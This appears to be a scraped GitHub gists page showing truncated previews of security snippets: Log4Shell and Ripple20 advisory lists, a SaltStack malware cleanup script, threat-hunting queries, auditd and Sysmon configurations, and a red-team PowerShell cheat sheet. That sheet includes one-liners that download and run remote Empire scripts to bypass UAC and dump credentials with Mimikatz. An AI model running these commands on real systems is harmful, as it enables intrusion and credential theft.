Murat Y. muratyokus

## 20211210-TLP-WHITE_LOG4J.md

      
              1 file
            
          
              94 forks
            
          
                907 comments
              
            
              1085 stars
            
          
                SwitHak
                / 20211210-TLP-WHITE_LOG4J.md
            
            
              Last active
              October 14, 2025 08:35
            
              
                BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC
              
          
    Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)
Errors, typos, something to say ?


If you want to add a link, comment or send it to me
Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources


Royce Williams list sorted by vendors responses Royce List
Very detailed list NCSC-NL
The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List


## 20200618-TLP-WHITE_Ripple20.md

      
              1 file
            
          
              6 forks
            
          
                4 comments
              
            
              16 stars
            
          
                SwitHak
                / 20200618-TLP-WHITE_Ripple20.md
            
            
              Last active
              June 9, 2025 15:41
            
              
                BlueTeam CheatSheet * Ripple20 * | Last updated: 2020-06-26 2121 UTC
              
          
    Ripple20, set of vulnerabilities inside Treck / KASAGO IP Stacks

General


Ripple20 is the codename to a set of 19 vulnerabilities discovered by the cybersecurity team JSOF.
These vulnerabilities are inside an IP stack, selled under two different names (Treck TCP/IP for U.S market Kasago TCP/IP, for Asia market.
-These two stacks were bought and used under privated-labeled by several softwares companies, some known names are: GHnetv2, Kwiknet, Quadnet.
But there's more, these stacks were also integrated, sometimes with modifications, inside several RTOS (real-time operating system).
Last, some of the vulnerabilities, depending the device operating system, configuration or location can have greater or lower CVSS score.
My advice is for companies to ask their suppliers if they use one of this stack and assess the risk following their company risk policy.
This will not be an easy set of vulnerabilities to patch, sadly.


## cleanup.sh
#!/bin/bash
## Executing this script is not a guarantee for a secure host!
## This script is a collection of the junk I have found on my hosts and what
## the SaltStack community gave as input. We have seen this attack evolve.
## Please have a very close look at your systems and consider reinstalling them
## to be absolutely sure you are free of malware.

# remove crontab persistence
for i in 54.36.185.99 217.8.117.137 176.31.60.91 217.12.210.192 54.36.185.99 54.36.185.99 89.223.121.139 torsocks anagima3 sa.sh$ c.sh$ selcdn.ru salt-store; do

## Threat Hunting
1- T1174 -  Password Filter - Catch malicious password filters event log
index=wineventlog EventID=4614
AND NOT NotificationPackageName IN ("scecli", "RASSFM", "WDIGEST", "KDCSVC", "KDCPW")
Reference
https://twitter.com/xknow_infosec/status/1178747476976820228
2- T1113 - Screen capture
     look for nircmd executions
     powershell execution with screenshot in arguments
3- T1074 - Data Staged
   enable object auditing files and folder - EventID 4663 - look for copying of different files in a short time span. Use bro

## RedTeam_CheatSheet.ps1
# Description:
#    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands

## 18650-fixed.py
#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2012
# Author: muts
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/

## audit.rules
# IMPORTANT!
# This gist has been transformed into a github repo
# You can find the most recent version there:
# https://github.com/Neo23x0/auditd

#      ___             ___ __      __
#     /   | __  ______/ (_) /_____/ /
#    / /| |/ / / / __  / / __/ __  /
#   / ___ / /_/ / /_/ / / /_/ /_/ /
#  /_/  |_\__,_/\__,_/_/\__/\__,_/

## Wireless Penetration Testing Cheat Sheet.md

      
              1 file
            
          
              83 forks
            
          
                1 comment
              
            
              194 stars
            
          
                dogrocker
                / Wireless Penetration Testing Cheat Sheet.md
            
            
              Created
              July 2, 2016 18:30
            
              
                Wireless Penetration Testing Cheat Sheet
              
          
    #Wireless Penetration Testing Cheat Sheet
##WIRELESS ANTENNA

Open the Monitor Mode

root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up


## mongodb_3.2.x_logging.md

      
              1 file
            
          
              6 forks
            
          
                0 comments
              
            
              14 stars
            
          
                leommoore
                / mongodb_3.2.x_logging.md
            
            
              Last active
              July 4, 2021 10:51
            
              
                MongoDB 3.2.x Logging
              
          
    MongoDB 3.2.x Logging

The main log file is the mongod.log. You can specify the log file location when you are starting the mongod process but if you have installed on Ubuntu from a package then you log file will normally be located in /var/log/mongodb/mongod.log.
You can tail the log file using:
tail -f /var/log/mongodb/mongod.log

From the Mongo shell you can also view the log file using:
show logs

  
## config-server.xml
<!--
   This is a Microsoft Sysmon configuation to be used on Windows server systems
   v0.2.1 December 2016
   Florian Roth

   The focus of this configuration is
   - hacking activity on servers / lateral movement (bad admin, attacker)
   It is not focussed on
   - malware detection (execution)
   - malware detection (network connections)
	#!/bin/bash
	## Executing this script is not a guarantee for a secure host!
	## This script is a collection of the junk I have found on my hosts and what
	## the SaltStack community gave as input. We have seen this attack evolve.
	## Please have a very close look at your systems and consider reinstalling them
	## to be absolutely sure you are free of malware.

	# remove crontab persistence
	for i in 54.36.185.99 217.8.117.137 176.31.60.91 217.12.210.192 54.36.185.99 54.36.185.99 89.223.121.139 torsocks anagima3 sa.sh$ c.sh$ selcdn.ru salt-store; do
	1- T1174 - Password Filter - Catch malicious password filters event log
	index=wineventlog EventID=4614
	AND NOT NotificationPackageName IN ("scecli", "RASSFM", "WDIGEST", "KDCSVC", "KDCPW")
	Reference
	https://twitter.com/xknow_infosec/status/1178747476976820228
	2- T1113 - Screen capture
	look for nircmd executions
	powershell execution with screenshot in arguments
	3- T1074 - Data Staged
	enable object auditing files and folder - EventID 4663 - look for copying of different files in a short time span. Use bro
	# Description:
	# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

	# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

	# Invoke-Mimikatz: Dump credentials from memory
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

	# Import Mimikatz Module to run further commands
	#!/usr/bin/python
	############################################################
	# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
	# Google Dork: oy vey
	# Date: March 23rd, 2012
	# Author: muts
	# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
	# Tested on: multiple
	# CVE : notyet
	# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
	# IMPORTANT!
	# This gist has been transformed into a github repo
	# You can find the most recent version there:
	# https://github.com/Neo23x0/auditd

	# ___ ___ __ __
	# / \| __ ______/ (_) /_____/ /
	# / /\| \|/ / / / __ / / __/ __ /
	# / ___ / /_/ / /_/ / / /_/ /_/ /
	# /_/ \|_\__,_/\__,_/_/\__/\__,_/
	<!--
	This is a Microsoft Sysmon configuation to be used on Windows server systems
	v0.2.1 December 2016
	Florian Roth

	The focus of this configuration is
	- hacking activity on servers / lateral movement (bad admin, attacker)
	It is not focussed on
	- malware detection (execution)
	- malware detection (network connections)